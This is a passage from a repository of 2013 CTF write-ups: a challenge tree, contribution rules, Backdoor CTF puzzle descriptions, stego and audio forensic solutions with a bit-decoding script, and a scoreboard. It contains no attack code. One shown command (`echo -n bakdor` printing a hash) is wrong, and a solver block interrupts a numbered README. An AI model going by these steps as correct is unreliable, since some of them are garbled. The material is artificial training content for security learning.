├── .gitignore ├── CONTRIBUTING.md ├── README.md ├── backdoorctf-2013 ├── README.md ├── binary │ ├── 50 │ │ ├── README.md │ │ ├── binary50.zip │ │ └── binary50_32bit.zip │ ├── 100 │ │ ├── 5be9af828d2476f4e654 │ │ ├── README.md │ │ ├── binary100.zip │ │ └── binary100_32bit.zip │ ├── 200 │ │ ├── README.md │ │ └── h4x0r.zip │ └── 500 │ │ ├── README.md │ │ └── h4x0r.zip ├── crypto │ ├── 75 │ │ └── README.md │ ├── 250 │ │ └── README.md │ └── 400 │ │ └── README.md ├── forensic │ ├── 150 │ │ ├── README.md │ │ └── wet_QR.png │ ├── 250 │ │ ├── README.md │ │ ├── bbb.png │ │ ├── get.py │ │ └── solved.bmp │ └── 300 │ │ ├── 0.png │ │ ├── 1.png │ │ ├── README.md │ │ ├── siri_audio.zip │ │ └── writeup.png └── scoreboard.txt ├── csaw-quals-2013 ├── README.md ├── crypto │ ├── csawpad-100 │ │ ├── README.md │ │ ├── csawpad-solve.py │ │ └── csawpad.py │ ├── onlythisprogram-300 │ │ ├── README.md │ │ ├── onlythisprogram.tgz │ │ └── source │ │ │ ├── README │ │ │ ├── input │ │ │ ├── Hackers.mid │ │ │ ├── Tux_ecb.jpg │ │ │ ├── diagram.png │ │ │ ├── enigma.jpg │ │ │ ├── key.gz │ │ │ ├── linux-penguin5_blastfishing_com.bmp │ │ │ ├── logo.gif │ │ │ ├── nelson.doc │ │ │ └── shannon1948.pdf │ │ │ ├── onlythisprogram.py │ │ │ ├── output │ │ │ ├── file0.enc │ │ │ ├── file1.enc │ │ │ ├── file2.enc │ │ │ ├── file3.enc │ │ │ ├── file4.enc │ │ │ ├── file5.enc │ │ │ ├── file6.enc │ │ │ ├── file7.enc │ │ │ └── file8.enc │ │ │ ├── runme.sh │ │ │ ├── secretkey.dat │ │ │ └── solve.py │ └── slurp-500 │ │ ├── README.md │ │ └── slurp.py ├── exploitation │ ├── csawdiary-300 │ │ ├── README.md │ │ └── fil_chal │ ├── exploit1-100 │ │ ├── README.md │ │ ├── exploit1 │ │ └── exploit1.c │ ├── exploit2-200 │ │ ├── README.md │ │ ├── e.py │ │ └── exploit2 │ ├── miteegashun-400 │ │ ├── README.md │ │ └── miteegashun │ └── scp-hack-500 │ │ ├── README.md │ │ └── solution.txt ├── misc │ ├── black-and-white-100 │ │ ├── README.md │ │ ├── chal.png │ │ └── key.png │ ├── deeeeeeaaaaaadbeeeeeeeeeef-200 │ │ ├── 1.png │ │ ├── 2.png 
│ │ ├── IMG_0707.png │ │ ├── README.md │ │ ├── crc_fixd.png │ │ ├── flag.png │ │ ├── resized_for_repo.png │ │ ├── wxh_fixd.png │ │ └── wxh_orig.png │ ├── life-300 │ │ ├── README.md │ │ └── source.txt │ ├── network1-50 │ │ ├── README.md │ │ └── networking.pcap │ └── network2-50 │ │ ├── README.md │ │ ├── networking.pcap │ │ └── networking.pcap.process ├── reversing │ ├── bikinibonanza-150 │ │ ├── README.md │ │ └── bikinibonanza.exe │ ├── crackme-300 │ │ ├── README.md │ │ └── crackme │ ├── csaw2013reversing1-100 │ │ ├── README.md │ │ └── csaw2013reversing1.exe │ ├── csaw2013reversing2-200 │ │ ├── README.md │ │ └── csaw2013reversing2.exe │ ├── dotnet-100 │ │ ├── DotNetReversing.exe │ │ └── README.md │ ├── impossible-500 │ │ ├── README.md │ │ └── impossible.nds │ ├── keygenme-400 │ │ ├── README.md │ │ ├── keygenme-source.txt │ │ ├── keygenme-source │ │ │ ├── LICENSE │ │ │ ├── README.md │ │ │ ├── cpu.cpp │ │ │ ├── cpu.h │ │ │ ├── encrypt.asm │ │ │ ├── instruction.cpp │ │ │ ├── instruction.h │ │ │ ├── keygenme.cpp │ │ │ └── solution │ │ │ │ ├── description.txt │ │ │ │ ├── keygen.cpp │ │ │ │ ├── server.rb │ │ │ │ ├── solver.rb │ │ │ │ └── solvertest.rb │ │ └── keygenme32.elf │ └── noobs-first-firmware-mod-500 │ │ ├── README.md │ │ └── noobs-first-firmware-mod.tgz ├── scoreboard.txt ├── solves.txt └── web │ ├── cryptomatv2-400 │ └── README.md │ ├── guess-harder-100 │ └── README.md │ ├── herpderper-300 │ ├── README.md │ └── herpderper.apk │ ├── nevernote-200 │ └── README.md │ ├── recon │ ├── alex-taylor.txt │ ├── brandon-edwards.txt │ ├── historypeats.txt │ ├── jordan-wiens.txt │ ├── julian-cohen.txt │ ├── kevin-chung.txt │ ├── odin.txt │ └── theodore-reed.txt │ └── widgetcorp-400 │ └── README.md ├── hack-lu-ctf-2013 ├── README.md ├── crypto │ ├── BREW-r-Y │ │ └── README.md │ ├── ECKA │ │ └── README.md │ ├── Geier-s-Lambda │ │ ├── README.md │ │ └── pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs │ └── Marvin-is-plain-Jane │ │ └── README.md ├── exploiting │ ├── 
Breznparadisebugmaschine │ │ ├── Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe │ │ └── README.md │ ├── Robotic-Superiority │ │ └── README.md │ └── Wannabe │ │ └── README.md ├── internals │ ├── Packed │ │ ├── README.md │ │ └── packed_7245b354be136111061c9a118d6304598f46c767 │ ├── Robot-Plans │ │ └── README.md │ └── What-s-wrong-with-this │ │ ├── README.md │ │ └── hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz ├── misc │ ├── Beer-Pump-Filtration │ │ └── README.md │ ├── For-whom-the-bell-tolls │ │ ├── README.md │ │ └── bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2 │ ├── Geolocation-Flag │ │ └── README.md │ ├── OTP │ │ └── README.md │ └── Roboparty │ │ └── README.md ├── reversing │ ├── ELF │ │ ├── README.md │ │ └── reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308 │ ├── FluxArchiv-Part1 │ │ ├── README.md │ │ └── hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz │ ├── FluxArchiv-Part2 │ │ ├── README.md │ │ └── hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz │ └── RoboAuth │ │ ├── README.md │ │ └── RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe └── web │ ├── Pay-TV │ └── README.md │ └── Robots-Exclusion-Committee │ └── README.md └── pico-ctf-2013 ├── README.md ├── bitwise ├── README.md ├── bitwise.java ├── bitwise.py └── solve.py ├── black-hole ├── 1.png ├── README.md ├── blackhole.img └── solve.png ├── byte-code ├── README.md └── tmpBPWe7T.zip ├── cfg-to-c ├── README.md └── cfg2c │ ├── func1.png │ ├── func2.png │ ├── func3.png │ ├── func4.png │ └── index.html ├── chromatophoria ├── README.md ├── solve.java └── steg.png ├── classic └── README.md ├── client-side-is-the-best-side ├── README.md └── clientside.html ├── core-decryption ├── README.md ├── core_decrypt.tar └── solve.py ├── dark-star ├── README.md ├── darkstar.img └── solve.png ├── ddos-detection ├── README.md ├── conversations.png └── syn_attack.pcap ├── failure-to-boot └── README.md ├── first-contact ├── 
README.md └── first_contact.pcap ├── getkey ├── README.md └── index.php ├── grep-is-your-friend ├── README.md └── grep.tar ├── in-hex-no-one-can-hear-you-complain ├── README.md ├── kane.docx └── key.png ├── injection ├── README.md └── index.php ├── navsat ├── README.md └── recovery.zip ├── overflow-1 ├── README.md ├── overflow1-3948d17028101c40 └── overflow1-3948d17028101c40.c ├── overflow-2 ├── README.md ├── overflow2-44e63640e033ff2b └── overflow2-44e63640e033ff2b.c ├── overflow-3 ├── README.md ├── overflow3-28d8a442fb232c0c └── overflow3-28d8a442fb232c0c.c ├── overflow-4 ├── README.md ├── overflow4-4834efeff17abdfb └── overflow4-4834efeff17abdfb.c ├── overflow-5 ├── README.md └── overflow5-0353c1a83cb2fa0d ├── php2 └── README.md ├── php3 └── README.md ├── php4 └── README.md ├── pilot-logic ├── README.md ├── pilot_image └── solve.png ├── pretty-hard-programming └── README.md ├── python-eval-1 └── README.md ├── python-eval-2 └── README.md ├── python-eval-3 └── README.md ├── python-eval-4 └── README.md ├── python-eval-5 └── README.md ├── read-the-manual ├── README.md └── tmp2xfLwN.txt ├── robomunication ├── README.md └── robo.mp3 ├── rop-1 ├── README.md ├── SMALL_HINT ├── rop1-fa6168f4d8eba0eb └── rop1.c ├── rop-2 ├── README.md ├── rop2-20f65dd0bcbe267d └── rop2-20f65dd0bcbe267d.c ├── rop-3 ├── README.md ├── rop3-7f3312fe43c46d26 ├── rop3-7f3312fe43c46d26.c └── soln.py ├── rop-4 ├── README.md ├── SMALL_HINT ├── rop4 └── rop4.c ├── rsa ├── README.md ├── rsa.txt ├── solve.py └── solve2.sh ├── second-contact ├── README.md └── kuiper.pcap ├── spaceport-map ├── README.md ├── frame4.gif ├── info.png └── spaceportmap.gif ├── spamcarver ├── README.md ├── newfile.new.jpg └── spamcarver.jpg ├── technician-challenge └── README.md ├── trivial ├── README.md └── encrypt.py ├── try-them-all ├── README.md ├── cracklib-small.txt └── trythemall.js ├── xmlol ├── README.md └── tmpVrg2Ah.xml └── yummy ├── README.md └── yummy.php /.gitignore: 
--------------------------------------------------------------------------------
*.DS_Store
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
# Contribution guide

Please take a moment to review this document in order to make the contribution process easy and effective for everyone involved.

## Adding a new write-up entry

1. Each CTF gets its own folder in the root of this repository. For example, ‘Foo Bar CTF 2015’ would get a folder named `foo-bar-ctf-2015`.
2. Every CTF challenge gets its own subfolder within that folder, with a suffix indicating its point value. For example, all files related to the ‘Foo Bar CTF 2015’ challenge named ‘Sucky sandbox’, which is worth `150` points, would be located in `foo-bar-ctf-2015/sucky-sandbox-150`.
3. Every CTF challenge folder needs a Markdown-formatted `README.md` file, e.g. `foo-bar-ctf-2015/sucky-sandbox-150/README.md`. This file contains any details about the challenge, the main write-up itself, and links to other write-ups and resources. The folder should also contain the source files needed to reproduce the challenge.
4. Once you’re done adding the entry or making your changes, submit a pull request using the GitHub web interface.
5. Finally, make sure you follow our committing rules (see below).

## Changing an existing entry

1. Feel free to make any changes you see fit. Add a link to a write-up on your blog, add missing source files, clarify explanations in the write-up, or — if you’ve found a better way to solve a challenge — simplify the existing solution.
2. Once you’re done, submit a pull request using the GitHub web interface.

## Committing rules

These rules exist to keep the repo maintainable and complete. Please consider following them.

1. Update the root `big-ctf/README.md` file when adding a write-up to `big-ctf/task/`. We have three different sections:
   * `Completed write-ups` - tasks for which there is at least one local repo write-up (see the `Write-up` section of each task)
   * `External write-ups only` - tasks for which there is at least one external write-up (see the `Other write-ups and resources` section of each task) but no local write-up
   * `Missing write-ups` - tasks for which there are no write-ups available (yet)
2. If there already is a write-up in the `Write-up` section and you want to add another local write-up, add an `Alternative write-up` section above the `Other write-ups and resources` section.
3. Do not add files larger than 15MB, to keep the repo relatively small. Upload the file to a service instead, or reference it from somewhere else.
4. Consider following these [committing rules](https://atom.io/docs/latest/contributing#git-commit-messages). For this repo, we like to use these [emojis](http://www.emoji-cheat-sheet.com/):
   * :memo: when adding a write-up to the `Write-up` section of a task
   * :floppy_disk: when adding resources for a task, e.g. files or scripts
   * :link: when adding a write-up link to the `Other write-ups and resources` section of a task
   * :pill: when fixing broken links or corrupt Markdown
   * :books: when updating the structure of this repo or adding a CTF skeleton structure
   * :fire: when deleting files
5. If you want to add a new CTF directory/structure (skeleton) with as little trouble as possible, consider using the `genctf.py` tool from [our tools repo](https://github.com/ctfs/write-ups-tools/).
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CTF write-ups 2013

There are some problems with [CTF](https://ctftime.org/ctf-wtf/) write-ups in general:

* they’re scattered across the interwebs
* they don’t usually include the original files needed to solve the challenge
* some of them are incomplete or skip ‘obvious’ parts of the explanation, and are therefore not as helpful for newcomers
* often they disappear when the owner forgets to renew their domain or shuts down their blog

This repository aims to solve those problems.

It’s a collection of CTF source files and write-ups that anyone can contribute to. Did you just publish a CTF write-up? [Let us know](https://github.com/ctfs/write-ups-2013/issues/new), and we’ll add a link to your post — or just add the link yourself and submit a pull request. Spot an issue with a solution? Correct it, and send a pull request.

## Contributing

Please read [CONTRIBUTING.md](CONTRIBUTING.md).

## Archive

* [Write-ups for CTFs that occurred in 2013](https://github.com/ctfs/write-ups-2013) (this repository)
* [Write-ups for CTFs that occurred in 2014](https://github.com/ctfs/write-ups-2014)
* [Write-ups for CTFs that occurred in 2015](https://github.com/ctfs/write-ups-2015)
* [Write-ups for CTFs that occurred in 2016](https://github.com/ctfs/write-ups-2016)
--------------------------------------------------------------------------------
/backdoorctf-2013/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013 write-ups

*
* [Scoreboard](https://ctftime.org/event/72) or [here](scoreboard.txt)

## Completed write-ups

* [forensic/250](forensic/250)
* [forensic/300](forensic/300)

## External write-ups only

* [binary/50](binary/50)
* [binary/100](binary/100)

## Missing write-ups

* [binary/200](binary/200)
* [binary/500](binary/500)
* [crypto/250](crypto/250)
* [crypto/400](crypto/400)
* [crypto/75](crypto/75)
* [forensic/150](forensic/150)
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/100/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Binary 100

**Category:** Binary
**Points:** 100
**Solves:**
**Description:**

> Solve it. As simple as that!
>
> Here is the source code of that binary.
>
> Flag is the md5 of secret string.
>
> Download the binary [file](binary100.zip).
> For 32bit users - [file](binary100_32bit.zip)

## Write-up

(TODO)

## Other write-ups and resources

*
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/100/binary100.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/100/binary100.zip
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/100/binary100_32bit.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/100/binary100_32bit.zip
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/200/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Binary 200

**Category:** Binary
**Points:** 200
**Solves:**
**Description:**

> h4x0r, after 10e^46578398239 blinks of the cursor on his windows 98 machine, managed to create something worth selling.
> Now, you would expect him to open source it but then how will he upgrade his Castle? Now you and I don't buy softwares do we?
> And this "Enter the Registration Key" prompt makes you and I want to tear your hairs apart.
> Your job is to get that #$&%$##@ key. This should be easy for us but we want you to
> have the fun.
>
> You can find the software [here](h4x0r.zip)
>
> Get cracking!

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/200/h4x0r.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/200/h4x0r.zip
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/50/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Binary 50

**Category:** Binary
**Points:** 50
**Solves:**
**Description:**

> One day, after getting tired of being made fun of by all the other hackers, he decided to finally take a look at BASH.
> His first thoughts were "Bash? Bash Windows? Oh those violent script kiddies!". After finishing hundreds of online tutorials,
> he accidentally (obviously) found a flag. His next status update was "The script kiddies will never be able to get the flag from this password protected binary."
>
> How dare he call you and us "script kiddies"?! Take him down.
> Here is the [file](binary50.zip).
> For 32bit users - [file](binary50_32bit.zip)

## Write-up

(TODO)

## Other write-ups and resources

*
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/50/binary50.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/50/binary50.zip
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/50/binary50_32bit.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/50/binary50_32bit.zip
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/500/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Binary 500

**Category:** Binary
**Points:** 500
**Solves:**
**Description:**

> h4x0r realized that his software had a vulnerability and has fixed the software now.
> After using it free for so much time, no one wants to buy it. Just get us the key again.
>
> You can find the software [here](h4x0r.zip)
>
> Get cracking!

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/binary/500/h4x0r.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/binary/500/h4x0r.zip
--------------------------------------------------------------------------------
/backdoorctf-2013/crypto/250/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Crypto 250

**Category:** Crypto
**Points:** 250
**Solves:**
**Description:**

> While poking around H4x0r's security systems, two text files containing a 16*32 array of hexadecimal characters were found. Neither adding nor subtracting the files from each other helped.
> H4x0r seems fond of bases lower than decimal. Unless you manage to crack this, he will succeed in his evil plans to rule the world.
>
> HINT: H4x0r loves binary representation and of course does the opposite of what everyone else does. So when everyone else uses XOR he...
> If after this you still are stuck, this might help you: for some reason he thinks pigs are related to ciphers!

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/crypto/400/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Crypto 400

**Category:** Crypto
**Points:** 400
**Solves:**
**Description:**

> Now, this is an open challenge. h4x0r has created his own encryption algorithm and has decided to challenge all the hackers in the world. He has made the code public here.
>
> He challenges you to find the text he has encrypted and promises to reward you handsomely if you manage to do so. To make things simpler he has also given you the hint that the text he has encrypted is only alphanumeric.
>
> The text encrypted using the above algorithm is:
>
> 168 232 100 162 135 179 112 100 173 206 106 123 106 195 179 157 123 173
>
> The flag is the MD5 of the decrypted text.
>
> HINT: Sometimes the most direct approach gives the answer

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/crypto/75/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Crypto 75

**Category:** Crypto
**Points:** 75
**Solves:**
**Description:**

> Decrypt this string 'RIVXR ITWZV OHVFM HVBMV HFVHC GLHEG RZHVR VS'
>
> Flag is the MD5 of decoded string.
>
> May the Force be with you!
>
> HINT: Wait a sec! was that Force or Source!

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/150/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Forensics 150

**Category:** Forensics
**Points:** 150
**Solves:**
**Description:**

> H4x0r decided he needs one more extra layer of advanced security. His access key is a QR code, and he keeps the only copy in his wallet. But when leaving his castle he fell into the moat and the QR code got wet and disfigured. Now he can't get back into his own castle and desperately needs a real hacker's help. His post on craigslist says so. This is your chance to get into his head.
>
> Here is the disfigured QR code:-
>
> The Flag is md5 of last 13 characters of password hidden in [the QR](wet_QR.png).
>
> H4x0r promises to reward 150 h4x0rcoins to anyone who gives him the password.
>
> HINT: Hmmm... Can't I just try and reverse the fading somehow?

## Write-up

(TODO)

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/150/wet_QR.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/150/wet_QR.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Forensics 250

**Category:** Forensics
**Points:** 250
**Solves:**
**Description:**

> h4x0r is fed up with all your attacks on his castle and has decided to retaliate by attacking us back. He sent us a mail with [this image](bbb.png) as a warning. Hope you can figure out his warning message:-
>
> MD5 of the message is the answer.

## Write-up

We are given a picture:

![](bbb.png)

Using `stegsolve`, we see that this picture contains a hidden binary text:

![](solved.bmp)

Extract these bits and convert them to `0`s and `1`s with this [script](get.py):

```bash
$ python get.py
011011010110111101100100011001010111001001101110011101110110000101110010011001100110000101110010011001010000000000000000000000000000
```

We convert the binary output to ASCII text using a small perl command and pipe the output to `xxd` to avoid scrambling our shell. The hidden row is longer than the message, so the text is followed by NUL padding (the `...` in the dump):

```bash
$ python get.py | perl -lpe '$_=pack"B*",$_' | xxd
0000000: 6d6f 6465 726e 7761 7266 6172 6500 0000  modernwarfare...
0000010: 000a
```

MD5 the resulting readable text and you have the flag. Note that `echo` appends a newline unless given `-n`, and the newline changes the hash:

```bash
$ echo modernwarfare | md5
3c87b2bc2f0e1143ecb67aa8570ffc1b
$ echo -n modernwarfare | md5
d2432052b887f9e09fb8fa44b11861ef
```

The flag is either `3c87b2bc2f0e1143ecb67aa8570ffc1b` or `d2432052b887f9e09fb8fa44b11861ef`.

## Other write-ups and resources

* none yet
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/bbb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/250/bbb.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/get.py:
--------------------------------------------------------------------------------
from PIL import Image

# solved.bmp is the stegsolve output: the hidden message is encoded in the
# top pixel row, one bit per pixel.
flag_img = Image.open("solved.bmp")
w, h = flag_img.size
msg = ''
# The original script uses the image height as the loop bound while walking
# the top row left to right; that bound is kept here as it produced the
# 132-bit output shown in the write-up.
for x in range(h):
    pixel = flag_img.getpixel((x, 0))
    # a white (255) first channel is a 0 bit, anything else is a 1 bit
    if pixel[0] == 255:
        msg += '0'
    else:
        msg += '1'
print(msg)
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/250/solved.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/250/solved.bmp
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/0.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/1.png
--------------------------------------------------------------------------------
/backdoorctf-2013/forensic/300/README.md:
--------------------------------------------------------------------------------
# Backdoor CTF 2013: Forensics 300

**Category:** Forensics
**Points:** 300
**Solves:**
**Description:**

> H4x0r has now learnt that simple text authentications are not the in thing today. Also since voice authentication is all the rage nowadays thanx to siri, he decided to get one for his castle. But he messed it up big time and now has an audio file which he himself can't seem to decipher. So now he needs your help to get into his own castle.
>
> You can find the file [here](siri_audio.zip).
>
> Find the hidden passphrase; the flag is the MD5 of the passphrase.
>
> HINT: It is an audioWAVE. Sometimes you might have to see things instead of hearing them.

## Write-up

This write-up is based on [h34dump](http://h34dump.com/2013/03/backdoorctf-2013-forensics-300/)'s write-up.

We are given a WAVE audio file. Opening it in `audacity` shows this waveform:

![](writeup.png)

Two patterns recur in the waveform (16 spikes / 8 sine waves), so we infer that we can decode the waves:

![](0.png)

as `0`

and

![](1.png)

as `1`.
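Both write-ups on this page finish with the same pipeline: a row of pixels (forensic/250) or a run of waveform symbols (forensic/300) becomes a bit string, the bits are packed into ASCII, and the text is hashed. The Python below is an added example, not code from the repository or from h34dump; it reimplements that pipeline without PIL or perl, taking the two bitstreams quoted in the write-ups as input. It pads a trailing partial byte the way perl's `pack "B*"` does, strips the NUL padding that a fixed-width stego row leaves after the message, and returns both MD5s a solver might submit, since `echo` and `echo -n` hash different strings. The `row_to_bits` helper and its `channel`/`white` parameters are assumptions modelled on get.py; the pixel row it is tested on is constructed.

```python
"""Bitstream-to-flag pipeline from the forensic/250 and forensic/300 write-ups.

Added example; not the repository's own code.  Nothing here reads an image or
audio file: the bitstreams are the ones quoted in the write-ups and any pixel
row is constructed by the caller.
"""
import hashlib
from typing import Dict, Iterable, Sequence

# Bitstreams quoted in the two write-ups (forensic/250 and forensic/300).
BITS_250 = "011011010110111101100100011001010111001001101110011101110110000101110010011001100110000101110010011001010000000000000000000000000000"
BITS_300 = "011000100110000101101011011001000110111101110010"


def row_to_bits(pixels: Iterable[Sequence[int]], channel: int = 0, white: int = 255) -> str:
    """Turn one row of pixel tuples into a bit string the way get.py does with
    stegsolve's output: a `white` value in `channel` is a 0, anything else a 1.
    (`channel` and `white` are assumed parameters; get.py hard-codes both.)"""
    return "".join("0" if px[channel] == white else "1" for px in pixels)


def bits_to_bytes(bits: str) -> bytes:
    """Pack a '0'/'1' string MSB-first into bytes.  A trailing partial group is
    right-padded with zero bits, matching perl's pack("B*", ...)."""
    if set(bits) - {"0", "1"}:
        raise ValueError("bitstream must contain only '0' and '1'")
    padded = bits + "0" * (-len(bits) % 8)
    return bytes(int(padded[i:i + 8], 2) for i in range(0, len(padded), 8))


def bits_to_text(bits: str) -> str:
    """Decode the packed bytes as ASCII and drop the NUL padding that a
    fixed-width stego row leaves after the message (the '...' in the xxd dump)."""
    return bits_to_bytes(bits).rstrip(b"\x00").decode("ascii")


def flag_candidates(text: str) -> Dict[str, str]:
    """Both hashes a solver might submit: `echo -n text | md5` hashes the bare
    string, `echo text | md5` hashes it with a trailing newline."""
    return {
        "no_newline": hashlib.md5(text.encode("ascii")).hexdigest(),
        "with_newline": hashlib.md5((text + "\n").encode("ascii")).hexdigest(),
    }


if __name__ == "__main__":
    for name, bits in (("forensic/250", BITS_250), ("forensic/300", BITS_300)):
        text = bits_to_text(bits)
        print(name, repr(text), flag_candidates(text))
```

Running the module prints `'modernwarfare'` for the forensic/250 stream and `'bakdor'` for the forensic/300 stream, each with both hash variants; when a scoreboard rejects one, the other is the usual culprit.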
35 | 36 | This results in the bitstream `011000100110000101101011011001000110111101110010`, which can be translated into ASCII characters using a simple perl command: 37 | 38 | 39 | ```bash 40 | $ echo 011000100110000101101011011001000110111101110010 | perl -lpe '$_=pack"B*",$_' 41 | bakdor 42 | $ echo -n bakdor 43 | e1b64df17443b51e3007fd3d5370dca1 44 | ``` 45 | 46 | The flag is `e1b64df17443b51e3007fd3d5370dca1`. 47 | 48 | ## Other write-ups and resources 49 | 50 | * -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/300/siri_audio.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/siri_audio.zip -------------------------------------------------------------------------------- /backdoorctf-2013/forensic/300/writeup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/backdoorctf-2013/forensic/300/writeup.png -------------------------------------------------------------------------------- /backdoorctf-2013/scoreboard.txt: -------------------------------------------------------------------------------- 1 | dcua 3815.000 2 | v3l0cityz3r0 3720.000 3 | Headump 3640.000 4 | p!r@t3s 3590.000 5 | Got Root 3515.000 6 | dnivra 3250.000 7 | botnet 3250.000 8 | sbi0s 3250.000 9 | bi0s 3250.000 10 | hellokitty 3225.000 11 | sakshi 3225.000 12 | 2sbi0s 3175.000 13 | 1338-offbyone 3175.000 14 | Beginbi0s 3100.000 15 | Inception 3050.000 16 | Graphite 2925.000 17 | NULL Life 2475.000 18 | ChocolateMakers 1850.000 19 | Akrockzzz 1550.000 20 | YouKnowWho 1425.000 21 | SsoMac 1400.000 22 | Inquisitive 1290.000 23 | hczi0npqu 1275.000 24 | webfuel 1225.000 25 | Rising Force 1200.000 26 | WeLoveCP 1200.000 27 | jayant 1120.000 28 | Testing 
1120.000 29 | abhshkdz 1050.000 30 | weareplaying 1050.000 31 | 0x01 1000.000 32 | LOOLOO 1000.000 33 | bithin 975.000 34 | deception 900.000 35 | ufologists 850.000 36 | OneManTeam 775.000 37 | p03p0wn 650.000 38 | Protocol 625.000 39 | PR0T0C0L 625.000 40 | bond 600.000 41 | pwners 500.000 42 | xelenonz 500.000 43 | h4x0r 500.000 44 | MyTeam 425.000 45 | jofrutas 400.000 46 | w0rmicelli 400.000 47 | Spounchers 375.000 48 | redeemer 350.000 49 | The DHARMA Initiative 300.000 50 | pouet 300.000 51 | Nemotest 225.000 52 | Big Boss 200.000 53 | TSTORMXSD 200.000 54 | hack_123 200.000 55 | zorianix 150.000 56 | lolcode 140.000 57 | hawk_eye 50.000 58 | delirium 50.000 59 | A-Team 50.000 60 | Nuts 50.000 61 | TeamNuts 50.000 62 | nk_team 50.000 63 | L0L 50.000 64 | trackdown 50.000 65 | achilles 50.000 66 | D3molition 50.000 67 | Army Ants 50.000 68 | BOTNET_OM 50.000 69 | backdoor 50.000 70 | empire 50.000 71 | ANONYMOUS 50.000 72 | The Agents 50.000 73 | dumbass 50.000 74 | knightwave 50.000 75 | KISS 50.000 76 | oioioi 50.000 77 | GoDFathER 50.000 78 | theDuffers 50.000 79 | dvjbndlsh93 50.000 80 | paglab 20.000 81 | -------------------------------------------------------------------------------- /csaw-quals-2013/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF write-ups 2 | 3 | * 4 | * [Scoreboard](https://ctftime.org/event/96) or [here](scoreboard.txt) 5 | * [Number of solves per task](solves.txt) 6 | 7 | ## Completed write-ups 8 | 9 | * [misc/black-and-white-100](misc/black-and-white-100) 10 | * [misc/deeeeeeaaaaaadbeeeeeeeeeef-200](misc/deeeeeeaaaaaadbeeeeeeeeeef-200) 11 | * [misc/network1-50](misc/network1-50) 12 